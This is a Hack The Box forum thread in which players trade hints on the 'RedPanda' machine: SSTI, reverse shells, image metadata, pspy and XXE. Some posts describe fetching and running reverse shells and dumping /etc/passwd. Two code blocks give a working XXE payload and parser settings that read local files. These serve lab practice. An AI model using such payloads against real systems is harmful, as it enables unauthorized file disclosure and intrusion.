Official RedPanda Discussion

Did you ever figure it out?

Can someone DM me on this? I've tried lots of different payloads and I'm not getting any closer.

Hey, I'm working on PE. I think I know what I have to do, but I need to write metadata to an image. Can someone recommend me a tool for this, or do I have to write my own code using the same library used in the original (victim's) code?

So I'm having a reverse shell issue. My exploit works and I receive a connection via our favorite kitty, but I have no shell. Just the PID and a connection confirmation on my end. I tried .traditional to use the -e, but no luck there. I can cat and look around. I found the user but not the flag with my attack only. My kitty is mute.

I'm in, I just can't talk to her. Can someone DM me??

DM

Have a look at exiftool.

Ty. Yes, I found it and it works.

Hi, for some reason the user flag is not accepted. I suspect it was tampered with. Can anybody help fix the situation? Thanks in advance :smiley:

Hi guys, I am new here and looking for a walkthrough. Kindly help.

Only when the machine gets retired.

1 Like

No, you're not in the right place.

Could you give me a clue? I found a way to list the system a little, but I am a little stuck, since I do not receive most of the syntax that I enter.

I did find the correct SSTI to dump /etc/passwd, for instance, and also the user flag by cat /dir/user.txt. But encoding and passing a bash revshell… grrrr, it just does not phone home! Do we have to call getInputStream after, or waitFor? It's my first Java machine.

I would recommend a stageless reverse shell instead of using bash to phone home.

1 Like

I also need help with the shell.
I have tried everything, from directly executing the commands to uploading shells and SSH, without any connection being possible.

I do have a shell now.

Upload works; however, making the file executable is "unusual".

Why is making the file executable unusual?

Not really unusual. I could not use the +x option with chmod. I had to use numerical permissions

It is possible by downloading a file and running it, and it is also possible to do it from the command line, but you will have to test a lot of possibilities until you get it. I think the simplest way is to download and run your revshell.

Despite the difficulty increase, I really liked this box. Some neat concepts to learn.

User:
Already a lot of hints on this, so I won't go much further. My big hint is: don't try to skip ahead without understanding what's going on. Follow the HackTricks article on the technique as much as you can. Because of the WAF, the crucial step of figuring out what is running isn't straightforward, but if you mess around on the site you will see a reference to a certain footwear tool. This should narrow down what is running greatly. From there, Google tutorials for the software you think is running.

To reiterate: you can't just copy-paste exploits. You are going to have to do some research to make a slight (very, very slight) modification to get it to work, but if you found a tutorial for the underlying software, you should have a good guess.

Root:
pspy is your friend. See what's running and dig into it. Once again, trying to skip through fast will end up slowing you down more. Read everything and understand what is going on.

The video posted above on XXE is a really good watch. If you watch that video and look through what you find on the system, you should have a pretty good idea of your end goal. To reach that goal you actually need to exploit a second vulnerability of the running application, due to your user's low running privileges. You can't test everything locally, but at a minimum I would recommend testing the XXE locally. If you want to play around with it locally, there are safety measures in most parsers, so I'll just save you some time and give you a helpful Python code snippet for local testing:

from lxml import etree
# load_dtd/no_network let the parser fetch the external entity; resolve_entities=True
# must be set explicitly on lxml 5 and later, where the default became "internal"
# (internal entities only, no file/URL access), which would silently defeat the test
parser = etree.XMLParser(load_dtd=True, no_network=False, huge_tree=True, resolve_entities=True)
tree = etree.parse("test.xml", parser=parser)  # test.xml holds your XXE payload
etree.dump(tree.getroot())  # prints the root element with the entity expanded
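As an added, self-contained example (not from the post above and not part of any HTB material), here is the same local XXE check using only Python's standard-library xml.sax parser instead of lxml, so it runs without extra packages. It shows the "safety measure" the post refers to: since Python 3.7.1, xml.sax refuses to load external general entities unless feature_external_ges is switched on, and flipping that switch is exactly what a vulnerable application effectively does. The "secret" file, its contents and the payload are constructed for the demo; the parser run with the feature enabled leaks the file, the default (hardened) run returns empty text.

```python
"""Local XXE test harness using only the Python standard library (xml.sax)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects every piece of character data the parser delivers, including
    text that arrives from an expanded external entity."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


def build_xxe_payload(target_path: str) -> bytes:
    """Classic XXE payload (constructed for this demo): declare an external
    general entity that points at a local file and reference it in content."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [\n'
        f'  <!ENTITY xxe SYSTEM "{target_path}">\n'
        ']>\n'
        '<data>&xxe;</data>\n'
    ).encode()


def parse_collecting_text(xml_bytes: bytes, allow_external_entities: bool) -> str:
    """Parse with xml.sax and return the collected text.

    Python 3.7.1+ disables external general entities by default; passing
    allow_external_entities=True re-enables them (the vulnerable configuration).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def demo_xxe() -> tuple:
    """Write a constructed 'secret' file, then parse one payload twice:
    with the vulnerable setting and with the hardened default.
    Returns (leaked_text, hardened_text)."""
    secret = "secret-file-contents (constructed sample, not a real flag)"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
        path = fh.name
    try:
        payload = build_xxe_payload(path)
        leaked = parse_collecting_text(payload, allow_external_entities=True)
        hardened = parse_collecting_text(payload, allow_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo_xxe()
    print("external entities enabled :", repr(leaked))
    print("external entities disabled:", repr(hardened))
```

When porting this check to the target's parser, the knob to look for is whichever option controls external entity resolution (resolve_entities and no_network in lxml, feature_external_ges here); a payload that works in the harness but not against the application usually means that knob is off server-side, or that a WAF is rewriting the DOCTYPE.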

Hi, I'm getting a reverse shell but it seems unstable. The site is getting a connection timeout. Is the machine unstable, or was my payload wrong? Please give me a nudge. Thanks.